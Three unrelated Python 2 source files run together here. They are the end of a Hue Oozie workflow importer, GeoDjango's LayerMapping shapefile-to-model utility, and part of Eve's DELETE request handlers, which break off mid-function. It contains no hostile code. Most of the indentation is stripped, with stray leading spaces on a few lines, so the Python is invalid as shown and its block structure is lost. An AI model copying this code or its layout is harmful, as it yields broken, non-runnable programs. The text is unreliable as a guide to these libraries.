end = decision_helper(end)
if end:
return end
        # Can do this because we've replaced all its parents with a single DecisionEnd node.
return helper(end)
else:
raise RuntimeError(_('Cannot import workflows that have decisions paths with multiple terminal nodes that converge on a single terminal node.'))
else:
raise RuntimeError(_('Cannot import workflows that have decisions paths that never end.'))
return None
def helper(node):
"""Iterates through nodes, returning ends."""
    # Assume we receive a full node.
children = [link.child.get_full_node() for link in node.get_children_links().exclude(name__in=['error','default'])]
# Will not be a kill node because we skip error links.
# Error links should not go to a regular node.
if node.get_parent_links().filter(name='error').exists():
raise RuntimeError(_('Error links cannot point to an ordinary node.'))
# Multiple parents means that we've found an end.
# Joins will always have more than one parent.
fan_in_count = len(node.get_parent_links().exclude(name__in=['error','default']))
if fan_in_count > 1 and not isinstance(node, Join) and not isinstance(node, DecisionEnd):
return node
elif isinstance(node, Decision):
end = decision_helper(node)
if end:
return end
    # In case of a fork, we should not find different ends.
elif len(children) > 1:
end = None
for child in children:
temp = helper(child)
end = end or temp
if end != temp:
raise RuntimeError(_('Different ends found in fork.'))
return end
elif children:
return helper(children.pop())
# Likely reached end.
return None
helper(workflow.start.get_full_node())
def _prepare_nodes(workflow, root):
"""
  Prepare nodes for grokking by Django
- Deserialize
- Automatically skip undefined nodes.
"""
objs = serializers.deserialize('xml', etree.tostring(root))
# First pass is a list of nodes and their types respectively.
# Must link up nodes with their respective full nodes.
node = None
nodes = []
for obj in objs:
obj.object.workflow = workflow
if type(obj.object) is Node:
node = obj.object
else:
node.node_type = obj.object.node_type
full_node = obj.object
for k, v in vars(node).items():
if not k.startswith('_') and k not in ('node_type','workflow','node_ptr_id'):
setattr(full_node, k, v)
full_node.workflow = workflow
full_node.node_type = type(full_node).node_type
full_node.node_ptr_id = None
full_node.id = None
nodes.append(full_node)
return nodes
def _preprocess_nodes(workflow, transformed_root, workflow_definition_root, nodes, fs=None):
"""
  Preprocess nodes.
  Resolves the start node name and subworkflow dependencies.
  Looks at the app path and interrogates all workflows until the proper deployment path is found.
  If the proper deployment path is never found, a RuntimeError is raised.
"""
for full_node in nodes:
    if full_node.node_type == 'start':
      full_node.name = 'start'
    elif full_node.node_type == 'subworkflow':
app_path = None
for action_el in workflow_definition_root:
if 'name' in action_el.attrib and action_el.attrib['name'] == full_node.name:
for subworkflow_el in action_el:
if xml_tag(subworkflow_el) == 'sub-workflow':
for property_el in subworkflow_el:
if xml_tag(property_el) == 'app-path':
app_path = property_el.text
if app_path is None:
raise RuntimeError(_("Could not find app-path for subworkflow %s") % full_node.name)
subworkflow = _resolve_subworkflow_from_deployment_dir(fs, workflow, app_path)
if subworkflow:
full_node.sub_workflow = subworkflow
else:
raise RuntimeError(_("Could not find subworkflow with deployment directory: %s") % app_path)
def _resolve_subworkflow_from_deployment_dir(fs, workflow, app_path):
"""
  Resolves the subworkflow referenced by a subworkflow node.
  Looks at the app path and interrogates all workflows until the proper deployment path is found.
  If the proper deployment path is never found, None is returned.
"""
if not fs:
raise RuntimeError(_("No hadoop file system to operate on."))
if app_path.endswith('/'):
app_path = app_path[:-1]
if app_path.startswith('hdfs://'):
app_path = app_path[7:]
try:
f = fs.open('%s/workflow.xml' % app_path)
    root = etree.parse(f).getroot()
f.close()
return Workflow.objects.get(name=root.attrib['name'])
except IOError:
pass
except (KeyError, AttributeError), e:
raise RuntimeError(_("Could not find workflow name when resolving subworkflow."))
except Workflow.DoesNotExist, e:
raise RuntimeError(_("Could not find workflow with name %s extracted from subworkflow path %s") % (root.attrib['name'], app_path))
except Exception, e:
raise RuntimeError(_("Could not find workflow at path %s") % app_path)
for subworkflow in Workflow.objects.available():
if subworkflow.deployment_dir == app_path:
if workflow.owner.id != subworkflow.owner.id:
raise RuntimeError(_("Subworkflow is not owned by %s") % workflow.owner)
return subworkflow
return None
def _save_nodes(workflow, nodes):
"""
Save nodes, but skip kill nodes because we create a single kill node to use.
"""
for node in nodes:
    if node.node_type == 'kill':
continue
try:
# Do not overwrite start or end node
Node.objects.get(workflow=workflow, node_type=node.node_type, name=node.name)
except Node.DoesNotExist:
node.save()
# Create kill node
# Only need it if we have a node to reference it with.
if len(nodes) > 2:
Kill.objects.create(name='kill', workflow=workflow, node_type=Kill.node_type)
def import_workflow(workflow, workflow_definition, fs=None):
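  """
  Imports the given Oozie workflow XML definition into the given Workflow
  model: transforms the definition with the versioned XSLT, deserializes the
  resulting nodes, resolves subworkflow dependencies, saves the nodes and
  links, and records the schema version on the workflow.
  """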
xslt_definition_fh = open("%(xslt_dir)s/workflow.xslt" % {
'xslt_dir': DEFINITION_XSLT_DIR.get()
})
# Parse Workflow Definition
workflow_definition_root = etree.fromstring(workflow_definition)
if workflow_definition_root is None:
raise RuntimeError(_("Could not find any nodes in Workflow definition. Maybe it's malformed?"))
ns = workflow_definition_root.tag[:-12] # Remove workflow-app from tag in order to get proper namespace prefix
schema_version = ns and ns[1:-1] or None
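  # e.g. a root tag of '{uri:oozie:workflow:0.4}workflow-app' yields
  # ns == '{uri:oozie:workflow:0.4}' and schema_version == 'uri:oozie:workflow:0.4'.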
# Ensure namespace exists
if schema_version not in OOZIE_NAMESPACES:
raise RuntimeError(_("Tag with namespace %(namespace)s is not valid. Please use one of the following namespaces: %(namespaces)s") % {
'namespace': workflow_definition_root.tag,
'namespaces': ', '.join(OOZIE_NAMESPACES)
})
# Get XSLT
xslt = etree.parse(xslt_definition_fh)
xslt_definition_fh.close()
transform = etree.XSLT(xslt)
# Transform XML using XSLT
transformed_root = transform(workflow_definition_root)
# Resolve workflow dependencies and node types and link dependencies
nodes = _prepare_nodes(workflow, transformed_root)
_preprocess_nodes(workflow, transformed_root, workflow_definition_root, nodes, fs)
_save_nodes(workflow, nodes)
_save_links(workflow, workflow_definition_root)
# Update schema_version
workflow.schema_version = schema_version
workflow.save()
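# A minimal usage sketch (not part of the original module): assumes a
# configured Hue/Django environment, an existing Workflow model instance and
# a readable definition file; the path below is hypothetical.
def _example_import(workflow, fs=None):
  # Read an Oozie workflow.xml definition and import it into the model.
  definition_fh = open('/tmp/workflow.xml')
  try:
    definition = definition_fh.read()
  finally:
    definition_fh.close()
  import_workflow(workflow, definition, fs=fs)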
|
|
# LayerMapping -- A Django Model/OGR Layer Mapping Utility
"""
The LayerMapping class provides a way to map the contents of OGR
vector files (e.g. SHP files) to Geographic-enabled Django models.
This grew out of my personal needs, specifically the code repetition
that went into pulling geometries and fields out of an OGR layer,
converting to another coordinate system (e.g. WGS84), and then inserting
into a GeoDjango model.
Please report any bugs encountered using this utility.
Requirements: OGR C Library (from GDAL) required.
Usage:
lm = LayerMapping(model, source_file, mapping) where,
model:
GeoDjango model (not an instance)
data:
OGR-supported data source file (e.g. a shapefile) or
gdal.DataSource instance
mapping:
A python dictionary, keys are strings corresponding
to the GeoDjango model field, and values correspond to
        string field names for the OGR feature, or, if the model field
        is a geographic field, it should correspond to the OGR
        geometry type, e.g. 'POINT', 'LINESTRING', 'POLYGON'.
Keyword Args:
layer:
The index of the layer to use from the Data Source (defaults to 0)
source_srs:
Use this to specify the source SRS manually (for example,
some shapefiles don't come with a '.prj' file). An integer SRID,
a string WKT, and SpatialReference objects are valid parameters.
encoding:
Specifies the encoding of the string in the OGR data source.
For example, 'latin-1', 'utf-8', and 'cp437' are all valid
encoding parameters.
transaction_mode:
May be 'commit_on_success' (default) or 'autocommit'.
transform:
Setting this to False will disable all coordinate transformations.
unique:
Setting this to the name, or a tuple of names, from the given
model will create models unique only to the given name(s).
        Geometries from each feature will be added into the collection
associated with the unique model. Forces transaction mode to
be 'autocommit'.
Example:
1. You need a GDAL-supported data source, like a shapefile.
Assume we're using the test_poly SHP file:
>>> from django.contrib.gis.gdal import DataSource
>>> ds = DataSource('test_poly.shp')
>>> layer = ds[0]
>>> print layer.fields # Exploring the fields in the layer, we only want the 'str' field.
['float', 'int', 'str']
>>> print len(layer) # getting the number of features in the layer (should be 3)
3
>>> print layer.geom_type # Should be 3 (a Polygon)
3
>>> print layer.srs # WGS84
GEOGCS["GCS_WGS_1984",
DATUM["WGS_1984",
SPHEROID["WGS_1984",6378137,298.257223563]],
PRIMEM["Greenwich",0],
UNIT["Degree",0.017453292519943295]]
2. Now we define our corresponding Django model (make sure to use syncdb):
from django.contrib.gis.db import models
class TestGeo(models.Model, models.GeoMixin):
name = models.CharField(maxlength=25) # corresponds to the 'str' field
poly = models.PolygonField(srid=4269) # we want our model in a different SRID
objects = models.GeoManager()
def __str__(self):
return 'Name: %s' % self.name
3. Use LayerMapping to extract all the features and place them in the database:
>>> from django.contrib.gis.utils import LayerMapping
>>> from geoapp.models import TestGeo
>>> mapping = {'name' : 'str', # The 'name' model field maps to the 'str' layer field.
'poly' : 'POLYGON', # For geometry fields use OGC name.
} # The mapping is a dictionary
>>> lm = LayerMapping(TestGeo, 'test_poly.shp', mapping)
>>> lm.save(verbose=True) # Save the layermap, imports the data.
Saved: Name: 1
Saved: Name: 2
Saved: Name: 3
LayerMapping just transformed the three geometries from the SHP file from their
source spatial reference system (WGS84) to the spatial reference system of
the GeoDjango model (NAD83). If no spatial reference system is defined for
the layer, use the `source_srs` keyword with a SpatialReference object to
specify one.
"""
import sys
from datetime import date, datetime
from decimal import Decimal
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.db.backend import SpatialBackend
from django.contrib.gis.gdal import CoordTransform, DataSource, \
OGRException, OGRGeometry, OGRGeomType, SpatialReference
from django.contrib.gis.gdal.field import \
OFTDate, OFTDateTime, OFTInteger, OFTReal, OFTString, OFTTime
from django.contrib.gis.models import GeometryColumns, SpatialRefSys
from django.db import models, transaction
# LayerMapping exceptions.
class LayerMapError(Exception): pass
class InvalidString(LayerMapError): pass
class InvalidDecimal(LayerMapError): pass
class InvalidInteger(LayerMapError): pass
class MissingForeignKey(LayerMapError): pass
class LayerMapping(object):
"A class that maps OGR Layers to GeoDjango Models."
# Acceptable 'base' types for a multi-geometry type.
MULTI_TYPES = {1 : OGRGeomType('MultiPoint'),
2 : OGRGeomType('MultiLineString'),
3 : OGRGeomType('MultiPolygon'),
}
# Acceptable Django field types and corresponding acceptable OGR
# counterparts.
FIELD_TYPES = {
models.AutoField : OFTInteger,
models.IntegerField : (OFTInteger, OFTReal, OFTString),
models.FloatField : (OFTInteger, OFTReal),
models.DateField : OFTDate,
models.DateTimeField : OFTDateTime,
models.EmailField : OFTString,
models.TimeField : OFTTime,
models.DecimalField : (OFTInteger, OFTReal),
models.CharField : OFTString,
models.SlugField : OFTString,
models.TextField : OFTString,
models.URLField : OFTString,
models.USStateField : OFTString,
models.XMLField : OFTString,
models.SmallIntegerField : (OFTInteger, OFTReal, OFTString),
models.PositiveSmallIntegerField : (OFTInteger, OFTReal, OFTString),
}
# The acceptable transaction modes.
TRANSACTION_MODES = {'autocommit' : transaction.autocommit,
'commit_on_success' : transaction.commit_on_success,
}
def __init__(self, model, data, mapping, layer=0,
source_srs=None, encoding=None,
transaction_mode='commit_on_success',
transform=True, unique=None):
"""
A LayerMapping object is initialized using the given Model (not an instance),
a DataSource (or string path to an OGR-supported data file), and a mapping
dictionary. See the module level docstring for more details and keyword
argument usage.
"""
# Getting the DataSource and the associated Layer.
if isinstance(data, basestring):
self.ds = DataSource(data)
else:
self.ds = data
self.layer = self.ds[layer]
# Setting the mapping
self.mapping = mapping
# Setting the model, and getting the geometry column associated
# with the model (an exception will be raised if there is no
# geometry column).
self.model = model
self.geo_col = self.geometry_column()
# Checking the source spatial reference system, and getting
# the coordinate transformation object (unless the `transform`
# keyword is set to False)
if transform:
self.source_srs = self.check_srs(source_srs)
self.transform = self.coord_transform()
else:
self.transform = transform
        # Checking the layer -- initialization of the object will fail if
        # things don't check out beforehand.
self.check_layer()
# Setting the encoding for OFTString fields, if specified.
if encoding:
# Making sure the encoding exists, if not a LookupError
# exception will be thrown.
from codecs import lookup
lookup(encoding)
self.encoding = encoding
else:
self.encoding = None
if unique:
self.check_unique(unique)
transaction_mode = 'autocommit' # Has to be set to autocommit.
self.unique = unique
else:
self.unique = None
# Setting the transaction decorator with the function in the
# transaction modes dictionary.
if transaction_mode in self.TRANSACTION_MODES:
self.transaction_decorator = self.TRANSACTION_MODES[transaction_mode]
self.transaction_mode = transaction_mode
else:
raise LayerMapError('Unrecognized transaction mode: %s' % transaction_mode)
#### Checking routines used during initialization ####
def check_fid_range(self, fid_range):
"This checks the `fid_range` keyword."
if fid_range:
if isinstance(fid_range, (tuple, list)):
return slice(*fid_range)
elif isinstance(fid_range, slice):
return fid_range
else:
raise TypeError
else:
return None
def check_layer(self):
"""
This checks the Layer metadata, and ensures that it is compatible
with the mapping information and model. Unlike previous revisions,
there is no need to increment through each feature in the Layer.
"""
# The geometry field of the model is set here.
# TODO: Support more than one geometry field / model.
self.geom_field = False
self.fields = {}
# Getting lists of the field names and the field types available in
# the OGR Layer.
ogr_fields = self.layer.fields
ogr_field_types = self.layer.field_types
# Function for determining if the OGR mapping field is in the Layer.
def check_ogr_fld(ogr_map_fld):
try:
idx = ogr_fields.index(ogr_map_fld)
except ValueError:
raise LayerMapError('Given mapping OGR field "%s" not found in OGR Layer.' % ogr_map_fld)
return idx
# No need to increment through each feature in the model, simply check
# the Layer metadata against what was given in the mapping dictionary.
for field_name, ogr_name in self.mapping.items():
# Ensuring that a corresponding field exists in the model
# for the given field name in the mapping.
try:
model_field = self.model._meta.get_field(field_name)
except models.fields.FieldDoesNotExist:
raise LayerMapError('Given mapping field "%s" not in given Model fields.' % field_name)
# Getting the string name for the Django field class (e.g., 'PointField').
fld_name = model_field.__class__.__name__
if isinstance(model_field, GeometryField):
if self.geom_field:
raise LayerMapError('LayerMapping does not support more than one GeometryField per model.')
try:
gtype = OGRGeomType(ogr_name)
except OGRException:
raise LayerMapError('Invalid mapping for GeometryField "%s".' % field_name)
# Making sure that the OGR Layer's Geometry is compatible.
ltype = self.layer.geom_type
if not (gtype == ltype or self.make_multi(ltype, model_field)):
raise LayerMapError('Invalid mapping geometry; model has %s, feature has %s.' % (fld_name, gtype))
# Setting the `geom_field` attribute w/the name of the model field
# that is a Geometry.
self.geom_field = field_name
fields_val = model_field
elif isinstance(model_field, models.ForeignKey):
if isinstance(ogr_name, dict):
# Is every given related model mapping field in the Layer?
rel_model = model_field.rel.to
for rel_name, ogr_field in ogr_name.items():
idx = check_ogr_fld(ogr_field)
try:
rel_field = rel_model._meta.get_field(rel_name)
except models.fields.FieldDoesNotExist:
raise LayerMapError('ForeignKey mapping field "%s" not in %s fields.' %
(rel_name, rel_model.__class__.__name__))
fields_val = rel_model
else:
raise TypeError('ForeignKey mapping must be of dictionary type.')
else:
# Is the model field type supported by LayerMapping?
if not model_field.__class__ in self.FIELD_TYPES:
raise LayerMapError('Django field type "%s" has no OGR mapping (yet).' % fld_name)
# Is the OGR field in the Layer?
idx = check_ogr_fld(ogr_name)
ogr_field = ogr_field_types[idx]
# Can the OGR field type be mapped to the Django field type?
if not issubclass(ogr_field, self.FIELD_TYPES[model_field.__class__]):
raise LayerMapError('OGR field "%s" (of type %s) cannot be mapped to Django %s.' %
(ogr_field, ogr_field.__name__, fld_name))
fields_val = model_field
self.fields[field_name] = fields_val
def check_srs(self, source_srs):
"Checks the compatibility of the given spatial reference object."
if isinstance(source_srs, SpatialReference):
sr = source_srs
elif isinstance(source_srs, SpatialRefSys):
sr = source_srs.srs
elif isinstance(source_srs, (int, basestring)):
sr = SpatialReference(source_srs)
else:
# Otherwise just pulling the SpatialReference from the layer
sr = self.layer.srs
if not sr:
raise LayerMapError('No source reference system defined.')
else:
return sr
def check_unique(self, unique):
"Checks the `unique` keyword parameter -- may be a sequence or string."
if isinstance(unique, (list, tuple)):
# List of fields to determine uniqueness with
for attr in unique:
if not attr in self.mapping: raise ValueError
elif isinstance(unique, basestring):
# Only a single field passed in.
if unique not in self.mapping: raise ValueError
else:
raise TypeError('Unique keyword argument must be set with a tuple, list, or string.')
#### Keyword argument retrieval routines ####
def feature_kwargs(self, feat):
"""
Given an OGR Feature, this will return a dictionary of keyword arguments
for constructing the mapped model.
"""
# The keyword arguments for model construction.
kwargs = {}
# Incrementing through each model field and OGR field in the
# dictionary mapping.
for field_name, ogr_name in self.mapping.items():
model_field = self.fields[field_name]
if isinstance(model_field, GeometryField):
# Verify OGR geometry.
val = self.verify_geom(feat.geom, model_field)
elif isinstance(model_field, models.base.ModelBase):
# The related _model_, not a field was passed in -- indicating
# another mapping for the related Model.
val = self.verify_fk(feat, model_field, ogr_name)
else:
# Otherwise, verify OGR Field type.
val = self.verify_ogr_field(feat[ogr_name], model_field)
# Setting the keyword arguments for the field name with the
# value obtained above.
kwargs[field_name] = val
return kwargs
def unique_kwargs(self, kwargs):
"""
Given the feature keyword arguments (from `feature_kwargs`) this routine
will construct and return the uniqueness keyword arguments -- a subset
of the feature kwargs.
"""
if isinstance(self.unique, basestring):
return {self.unique : kwargs[self.unique]}
else:
return dict((fld, kwargs[fld]) for fld in self.unique)
#### Verification routines used in constructing model keyword arguments. ####
def verify_ogr_field(self, ogr_field, model_field):
"""
Verifies if the OGR Field contents are acceptable to the Django
model field. If they are, the verified value is returned,
otherwise the proper exception is raised.
"""
if (isinstance(ogr_field, OFTString) and
isinstance(model_field, (models.CharField, models.TextField))):
if self.encoding:
# The encoding for OGR data sources may be specified here
# (e.g., 'cp437' for Census Bureau boundary files).
val = unicode(ogr_field.value, self.encoding)
else:
val = ogr_field.value
if len(val) > model_field.max_length:
raise InvalidString('%s model field maximum string length is %s, given %s characters.' %
(model_field.name, model_field.max_length, len(val)))
elif isinstance(ogr_field, OFTReal) and isinstance(model_field, models.DecimalField):
try:
# Creating an instance of the Decimal value to use.
d = Decimal(str(ogr_field.value))
except:
raise InvalidDecimal('Could not construct decimal from: %s' % ogr_field.value)
# Getting the decimal value as a tuple.
dtup = d.as_tuple()
digits = dtup[1]
d_idx = dtup[2] # index where the decimal is
# Maximum amount of precision, or digits to the left of the decimal.
max_prec = model_field.max_digits - model_field.decimal_places
# Getting the digits to the left of the decimal place for the
# given decimal.
if d_idx < 0:
n_prec = len(digits[:d_idx])
else:
n_prec = len(digits) + d_idx
# If we have more than the maximum digits allowed, then throw an
# InvalidDecimal exception.
if n_prec > max_prec:
raise InvalidDecimal('A DecimalField with max_digits %d, decimal_places %d must round to an absolute value less than 10^%d.' %
(model_field.max_digits, model_field.decimal_places, max_prec))
val = d
elif isinstance(ogr_field, (OFTReal, OFTString)) and isinstance(model_field, models.IntegerField):
# Attempt to convert any OFTReal and OFTString value to an OFTInteger.
try:
val = int(ogr_field.value)
except:
raise InvalidInteger('Could not construct integer from: %s' % ogr_field.value)
else:
val = ogr_field.value
return val
def verify_fk(self, feat, rel_model, rel_mapping):
"""
Given an OGR Feature, the related model and its dictionary mapping,
this routine will retrieve the related model for the ForeignKey
mapping.
"""
# TODO: It is expensive to retrieve a model for every record --
# explore if an efficient mechanism exists for caching related
# ForeignKey models.
# Constructing and verifying the related model keyword arguments.
fk_kwargs = {}
for field_name, ogr_name in rel_mapping.items():
fk_kwargs[field_name] = self.verify_ogr_field(feat[ogr_name], rel_model._meta.get_field(field_name))
# Attempting to retrieve and return the related model.
try:
return rel_model.objects.get(**fk_kwargs)
except ObjectDoesNotExist:
raise MissingForeignKey('No ForeignKey %s model found with keyword arguments: %s' % (rel_model.__name__, fk_kwargs))
def verify_geom(self, geom, model_field):
"""
Verifies the geometry -- will construct and return a GeometryCollection
if necessary (for example if the model field is MultiPolygonField while
the mapped shapefile only contains Polygons).
"""
if self.make_multi(geom.geom_type, model_field):
# Constructing a multi-geometry type to contain the single geometry
multi_type = self.MULTI_TYPES[geom.geom_type.num]
g = OGRGeometry(multi_type)
g.add(geom)
else:
g = geom
# Transforming the geometry with our Coordinate Transformation object,
# but only if the class variable `transform` is set w/a CoordTransform
# object.
if self.transform: g.transform(self.transform)
# Returning the WKT of the geometry.
return g.wkt
#### Other model methods ####
def coord_transform(self):
"Returns the coordinate transformation object."
try:
# Getting the target spatial reference system
target_srs = SpatialRefSys.objects.get(srid=self.geo_col.srid).srs
# Creating the CoordTransform object
return CoordTransform(self.source_srs, target_srs)
except Exception, msg:
raise LayerMapError('Could not translate between the data source and model geometry: %s' % msg)
def geometry_column(self):
"Returns the GeometryColumn model associated with the geographic column."
# Getting the GeometryColumn object.
try:
db_table = self.model._meta.db_table
if SpatialBackend.name == 'oracle': db_table = db_table.upper()
gc_kwargs = {GeometryColumns.table_name_col() : db_table}
return GeometryColumns.objects.get(**gc_kwargs)
except Exception, msg:
raise LayerMapError('Geometry column does not exist for model. (did you run syncdb?):\n %s' % msg)
def make_multi(self, geom_type, model_field):
"""
Given the OGRGeomType for a geometry and its associated GeometryField,
determine whether the geometry should be turned into a GeometryCollection.
"""
return (geom_type.num in self.MULTI_TYPES and
model_field.__class__.__name__ == 'Multi%s' % geom_type.django)
def save(self, verbose=False, fid_range=False, step=False,
progress=False, silent=False, stream=sys.stdout, strict=False):
"""
Saves the contents from the OGR DataSource Layer into the database
according to the mapping dictionary given at initialization.
Keyword Parameters:
verbose:
If set, information will be printed subsequent to each model save
executed on the database.
fid_range:
May be set with a slice or tuple of (begin, end) feature ID's to map
from the data source. In other words, this keyword enables the user
to selectively import a subset range of features in the geographic
data source.
step:
If set with an integer, transactions will occur at every step
interval. For example, if step=1000, a commit would occur after
the 1,000th feature, the 2,000th feature etc.
progress:
When this keyword is set, status information will be printed giving
          the number of features processed and successfully saved. By default,
          progress information will be printed every 1000 features processed,
however, this default may be overridden by setting this keyword with an
integer for the desired interval.
stream:
Status information will be written to this file handle. Defaults to
using `sys.stdout`, but any object with a `write` method is supported.
silent:
By default, non-fatal error notifications are printed to stdout, but
this keyword may be set to disable these notifications.
strict:
Execution of the model mapping will cease upon the first error
encountered. The default behavior is to attempt to continue.
"""
# Getting the default Feature ID range.
default_range = self.check_fid_range(fid_range)
# Setting the progress interval, if requested.
if progress:
if progress is True or not isinstance(progress, int):
progress_interval = 1000
else:
progress_interval = progress
# Defining the 'real' save method, utilizing the transaction
# decorator created during initialization.
@self.transaction_decorator
def _save(feat_range=default_range, num_feat=0, num_saved=0):
if feat_range:
layer_iter = self.layer[feat_range]
else:
layer_iter = self.layer
for feat in layer_iter:
num_feat += 1
# Getting the keyword arguments
try:
kwargs = self.feature_kwargs(feat)
except LayerMapError, msg:
# Something borked the validation
if strict: raise
elif not silent:
stream.write('Ignoring Feature ID %s because: %s\n' % (feat.fid, msg))
else:
# Constructing the model using the keyword args
is_update = False
if self.unique:
# If we want unique models on a particular field, handle the
# geometry appropriately.
try:
# Getting the keyword arguments and retrieving
# the unique model.
u_kwargs = self.unique_kwargs(kwargs)
m = self.model.objects.get(**u_kwargs)
is_update = True
# Getting the geometry (in OGR form), creating
# one from the kwargs WKT, adding in additional
# geometries, and update the attribute with the
# just-updated geometry WKT.
geom = getattr(m, self.geom_field).ogr
new = OGRGeometry(kwargs[self.geom_field])
for g in new: geom.add(g)
setattr(m, self.geom_field, geom.wkt)
except ObjectDoesNotExist:
# No unique model exists yet, create.
m = self.model(**kwargs)
else:
m = self.model(**kwargs)
try:
# Attempting to save.
m.save()
num_saved += 1
if verbose: stream.write('%s: %s\n' % (is_update and 'Updated' or 'Saved', m))
except SystemExit:
raise
except Exception, msg:
if self.transaction_mode == 'autocommit':
# Rolling back the transaction so that other model saves
# will work.
transaction.rollback_unless_managed()
if strict:
# Bailing out if the `strict` keyword is set.
if not silent:
stream.write('Failed to save the feature (id: %s) into the model with the keyword arguments:\n' % feat.fid)
stream.write('%s\n' % kwargs)
raise
elif not silent:
stream.write('Failed to save %s:\n %s\nContinuing\n' % (kwargs, msg))
# Printing progress information, if requested.
if progress and num_feat % progress_interval == 0:
stream.write('Processed %d features, saved %d ...\n' % (num_feat, num_saved))
# Only used for status output purposes -- incremental saving uses the
# values returned here.
return num_saved, num_feat
nfeat = self.layer.num_feat
if step and isinstance(step, int) and step < nfeat:
# Incremental saving is requested at the given interval (step)
if default_range:
raise LayerMapError('The `step` keyword may not be used in conjunction with the `fid_range` keyword.')
beg, num_feat, num_saved = (0, 0, 0)
indices = range(step, nfeat, step)
n_i = len(indices)
for i, end in enumerate(indices):
# Constructing the slice to use for this step; the last slice is
                # special (e.g., [100:] instead of [90:100]).
if i+1 == n_i: step_slice = slice(beg, None)
else: step_slice = slice(beg, end)
try:
num_feat, num_saved = _save(step_slice, num_feat, num_saved)
beg = end
except:
stream.write('%s\nFailed to save slice: %s\n' % ('=-' * 20, step_slice))
raise
else:
# Otherwise, just calling the previously defined _save() function.
_save()
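# A minimal usage sketch of the keyword arguments documented above (not part
# of the original module): the model, shapefile path and mapping are the
# hypothetical ones from the module docstring, and a configured GeoDjango
# project is assumed.
def _example_layer_mapping(TestGeo):
    mapping = {'name': 'str', 'poly': 'POLYGON'}
    lm = LayerMapping(TestGeo, 'test_poly.shp', mapping, encoding='latin-1')
    # Save in steps of 1000 features with progress output; bad features are
    # skipped rather than aborting the run.
    lm.save(step=1000, progress=True, strict=False, verbose=True)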
|
|
# -*- coding: utf-8 -*-
"""
eve.methods.delete
~~~~~~~~~~~~~~~~~~
    This module implements the DELETE method.
:copyright: (c) 2015 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from flask import current_app as app, abort
from eve.utils import config, debug_error_message, ParsedRequest
from eve.auth import requires_auth
from eve.methods.common import get_document, ratelimit, pre_event, \
oplog_push, resolve_document_etag
from eve.versioning import versioned_id_field, resolve_document_version, \
insert_versioning_documents, late_versioning_catch
from datetime import datetime
import copy
@ratelimit()
@requires_auth('item')
@pre_event
def deleteitem(resource, **lookup):
"""
Default function for handling DELETE requests, it has decorators for
rate limiting, authentication and for raising pre-request events.
    After the decorators are applied, forwards the call to
:func:`deleteitem_internal`
.. versionchanged:: 0.5
Split into deleteitem() and deleteitem_internal().
"""
return deleteitem_internal(resource, concurrency_check=True, **lookup)
def deleteitem_internal(
resource, concurrency_check=False, suppress_callbacks=False, **lookup):
""" Intended for internal delete calls, this method is not rate limited,
authentication is not checked, pre-request events are not raised, and
concurrency checking is optional. Deletes a resource item.
:param resource: name of the resource to which the item(s) belong.
:param concurrency_check: concurrency check switch (bool)
:param **lookup: item lookup query.
.. versionchanged:: 0.6
Support for soft delete.
.. versionchanged:: 0.5
Return 204 NoContent instead of 200.
Push updates to OpLog.
Original deleteitem() has been split into deleteitem() and
deleteitem_internal().
.. versionchanged:: 0.4
Fix #284: If you have a media field, and set datasource projection to
0 for that field, the media will not be deleted.
Support for document versioning.
'on_delete_item' events raised before performing the delete.
'on_deleted_item' events raised after performing the delete.
.. versionchanged:: 0.3
Delete media files as needed.
Pass the explicit query filter to the data driver, as it does not
support the id argument anymore.
.. versionchanged:: 0.2
Raise pre_<method> event.
.. versionchanged:: 0.0.7
Support for Rate-Limiting.
.. versionchanged:: 0.0.5
Pass current resource to ``parse_request``, allowing for proper
processing of new configuration settings: `filters`, `sorting`, `paging`.
.. versionchanged:: 0.0.4
Added the ``requires_auth`` decorator.
"""
soft_delete_enabled = config.DOMAIN[resource]['soft_delete']
original = get_document(resource, concurrency_check, **lookup)
if not original or (soft_delete_enabled and
original.get(config.DELETED) is True):
abort(404)
# notify callbacks
if suppress_callbacks is not True:
getattr(app, "on_delete_item")(resource, original)
getattr(app, "on_delete_item_%s" % resource)(original)
if soft_delete_enabled:
# Instead of removing the document from the db, just mark it as deleted
marked_document = copy.deepcopy(original)
# Set DELETED flag and update metadata
last_modified = datetime.utcnow().replace(microsecond=0)
marked_document[config.DELETED] = True
marked_document[config.LAST_UPDATED] = last_modified
if config.IF_MATCH:
resolve_document_etag(marked_document, resource)
resolve_document_version(marked_document, resource, 'DELETE', original)
# Update document in database (including version collection if needed)
id = original[config.ID_FIELD]
try:
app.data.replace(resource, id, marked_document, original)
except app.data.OriginalChangedError:
if concurrency_check:
abort(412, description=debug_error_message(
'Client and server etags don\'t match'
))
# create previous version if it wasn't already there
late_versioning_catch(original, resource)
# and add deleted version
insert_versioning_documents(resource, marked_document)
else:
# Delete the document for real
# media cleanup
media_fields = app.config['DOMAIN'][resource]['_media']
# document might miss one or more media fields because of datasource
# and/or client projection.
missing_media_fields = [f for f in media_fields if f not in original]
if len(missing_media_fields):
# retrieve the whole document so we have all media fields available
            # Should be a very rare occurrence. We can't get rid of the
# get_document() call since it also deals with etag matching, which
# is still needed. Also, this lookup should never fail.
# TODO not happy with this hack. Not at all. Is there a better way?
original = app.data.find_one_raw(
resource, original[config.ID_FIELD])
for field in media_fields:
if field in original:
app.media.delete(original[field])
id = original[config.ID_FIELD]
app.data.remove(resource, {config.ID_FIELD: id})
# TODO: should attempt to delete version collection even if setting is
# off
if app.config['DOMAIN'][resource]['versioning'] is True:
app.data.remove(
resource + config.VERSIONS,
{versioned_id_field(): original[config.ID_FIELD]})
# update oplog if needed
oplog_push(resource, original, 'DELETE', id)
if suppress_callbacks is not True:
getattr(app, "on_deleted_item")(resource, original)
getattr(app, "on_deleted_item_%s" % resource)(original)
return {}, None, None, 204
@requires_auth('resource')
@pre_event
def delete(resource, **lookup):
""" Deletes all item of a resource (collection in MongoDB terms). Won't
drop indexes. Use with caution!
.. versionchanged:: 0.5
Return 204 NoContent instead of 200.
.. versionchanged:: 0.4
Support for document versioning.
'on_delete_resource' raised before performing the actual delete.
'on_deleted_resource' raised after performing the delete
.. versionchanged:: 0.3
    Support for the lookup filter, which allows for deletion of
sub-resources (only delete documents that match a given condition).
.. versionchanged:: 0.0.4
Added the ``requires_auth`` decorator.
.. versionadded:: 0.0.2
"""
getattr(app, "on_delete_resource")(resource)
getattr(app, "on_delete_resource_%s" % resource)()
if config.DOMAIN[resource]['soft_delete']:
# Soft delete all items not already marked deleted
# (by default, data.find doesn't return soft deleted items)
